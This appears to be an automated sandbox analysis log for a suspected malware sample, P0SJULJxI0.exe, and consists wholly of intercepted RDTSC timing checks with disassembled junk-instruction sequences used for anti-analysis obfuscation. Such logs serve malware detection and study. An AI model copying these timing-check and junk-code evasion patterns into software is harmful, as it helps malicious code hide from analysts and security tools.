                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12058 second address: D120A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944C70C96h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA944C70C92h 0x00000016 pop edx 0x00000017 jl 00007FA944C70C8Eh 0x0000001d jns 00007FA944C70C86h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3F952 second address: E3F95F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA944B213E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF08 second address: E3FF31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D2D86h] 0x00000011 push dword ptr [ebp+122D2B2Ah] 0x00000017 stc 0x00000018 push 19D7C251h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jp 00007FA944C70C86h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF31 second address: E3FF37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF37 second address: E3FF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3FF3B second address: E3FF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E41944 second address: E41949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E41949 second address: E41953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA944B213E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E413F2 second address: E4142D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C95h 0x00000007 jnl 00007FA944C70C86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007FA944C70C94h 0x00000015 jno 00007FA944C70C86h 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4142D second address: E4145A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA944B213F3h 0x00000008 jmp 00007FA944B213F3h 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4145A second address: E4147B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C8Ah 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA944C70C8Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4147B second address: E4147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E4147F second address: E41483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E43418 second address: E4341C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D57209 second address: D57213 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02D4 second address: 52F02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02DA second address: 52F02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02DE second address: 52F02E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02E2 second address: 52F02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F02F1 second address: 52F030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F030A second address: 52F031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F031A second address: 52F0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FA944B213F7h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FA944B213F6h 0x00000017 mov edx, dword ptr [ebp+0Ch] 0x0000001a jmp 00007FA944B213F0h 0x0000001f mov ecx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA944B213F7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0383 second address: 52F0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0389 second address: 52F038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F03A0 second address: 52F03A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310549 second address: 531056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531056D second address: 531057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531057F second address: 53105B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 0F0722BFh 0x00000011 pushfd 0x00000012 jmp 00007FA944B213F4h 0x00000017 or ax, 8DA8h 0x0000001c jmp 00007FA944B213EBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53105B7 second address: 53105D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA944C70C8Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53105D0 second address: 53105D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53105D6 second address: 53105DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53105DA second address: 5310617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FA944B213F6h 0x0000000e mov dword ptr [esp], ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 mov si, dx 0x00000016 pop edx 0x00000017 mov ecx, 48CFB375h 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA944B213EAh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310617 second address: 5310626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310626 second address: 5310667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 jmp 00007FA944B213F4h 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310667 second address: 531066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531066D second address: 53106A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA944B213F0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA944B213EEh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53106A7 second address: 5310717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA944C70C91h 0x00000009 adc si, C8B6h 0x0000000e jmp 00007FA944C70C91h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA944C70C90h 0x0000001a sbb ecx, 2D3443D8h 0x00000020 jmp 00007FA944C70C8Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 nop 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e jmp 00007FA944C70C90h 0x00000033 popad 0x00000034 push dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310717 second address: 531071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53107AC second address: 53107B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53107B2 second address: 5310800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b jmp 00007FA944B213F0h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, 790B4C30h 0x00000019 call 00007FA944B213F9h 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310800 second address: 5300048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FA944C70C90h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 sub esp, 04h 0x00000016 xor ebx, ebx 0x00000018 cmp eax, 00000000h 0x0000001b je 00007FA944C70DEAh 0x00000021 mov dword ptr [esp], 0000000Dh 0x00000028 call 00007FA9493ECE21h 0x0000002d mov edi, edi 0x0000002f jmp 00007FA944C70C96h 0x00000034 xchg eax, ebp 0x00000035 jmp 00007FA944C70C90h 0x0000003a push eax 0x0000003b jmp 00007FA944C70C8Bh 0x00000040 xchg eax, ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 call 00007FA944C70C8Bh 0x00000049 pop eax 0x0000004a push ebx 0x0000004b pop esi 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300048 second address: 5300098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 18E43EA0h 0x00000013 pushfd 0x00000014 jmp 00007FA944B213F9h 0x00000019 xor ch, FFFFFFA6h 0x0000001c jmp 00007FA944B213F1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300098 second address: 530009D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 530009D second address: 53000D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA944B213EDh 0x0000000a or ah, 00000006h 0x0000000d jmp 00007FA944B213F1h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 sub esp, 2Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53000D0 second address: 53000D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53000D4 second address: 53000DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53000DA second address: 53000E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53000E0 second address: 5300114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FA944B213F0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA944B213EEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300114 second address: 5300126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300126 second address: 530012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 530012A second address: 53001A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push ebx 0x0000000b call 00007FA944C70C98h 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 pushfd 0x00000013 jmp 00007FA944C70C90h 0x00000018 add eax, 0AADEFF8h 0x0000001e jmp 00007FA944C70C8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FA944C70C8Bh 0x0000002f adc ax, 3BBEh 0x00000034 jmp 00007FA944C70C99h 0x00000039 popfd 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53001A5 second address: 53001AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53001AB second address: 53001AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53001AF second address: 5300250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA944B213F7h 0x00000013 xor si, DB2Eh 0x00000018 jmp 00007FA944B213F9h 0x0000001d popfd 0x0000001e mov bx, si 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 call 00007FA944B213F2h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007FA944B213F1h 0x00000036 sub esi, 35EC44C6h 0x0000003c jmp 00007FA944B213F1h 0x00000041 popfd 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 530030A second address: 5300310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300310 second address: 5300353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov ebx, 154ECB5Ch 0x00000015 popad 0x00000016 test al, al 0x00000018 pushad 0x00000019 mov di, 29F4h 0x0000001d mov si, di 0x00000020 popad 0x00000021 je 00007FA944B2159Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA944B213F2h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300353 second address: 5300365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300365 second address: 5300369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300369 second address: 53003A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b jmp 00007FA944C70C97h 0x00000010 mov dword ptr [ebp-14h], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA944C70C90h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53003A2 second address: 53003B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53003B1 second address: 53003B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53003B7 second address: 53003BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53003BB second address: 53003BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53003D8 second address: 530040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e call 00007FA944B213F1h 0x00000013 mov di, si 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, 8BCAh 0x00000020 mov cx, bx 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 530040E second address: 5300420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, 18A3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300420 second address: 5300425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53004C5 second address: 53004C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53004C9 second address: 53004CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53004CF second address: 530054B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA9B659EC40h 0x0000000f jmp 00007FA944C70C90h 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 jmp 00007FA944C70C90h 0x0000001c lea eax, dword ptr [ebp-2Ch] 0x0000001f jmp 00007FA944C70C90h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov esi, 710AA07Dh 0x0000002b pushfd 0x0000002c jmp 00007FA944C70C8Ah 0x00000031 or ecx, 7EA38358h 0x00000037 jmp 00007FA944C70C8Bh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov edi, eax 0x00000044 mov al, 21h 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 530054B second address: 53005A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 50085900h 0x00000012 pushfd 0x00000013 jmp 00007FA944B213F9h 0x00000018 or ax, 4306h 0x0000001d jmp 00007FA944B213F1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53005A2 second address: 53005B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E59 second address: 52F0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E5D second address: 52F0E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E63 second address: 52F0E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E68 second address: 52F0E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E79 second address: 52F0E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0E7F second address: 52F0EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA944C70C8Bh 0x00000013 or al, FFFFFFFEh 0x00000016 jmp 00007FA944C70C99h 0x0000001b popfd 0x0000001c mov dx, si 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0EC7 second address: 52F0F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3741605Eh 0x00000008 mov dl, 24h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 jmp 00007FA944B213ECh 0x00000015 mov ch, FEh 0x00000017 popad 0x00000018 push ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA944B213F9h 0x00000020 rdtsc
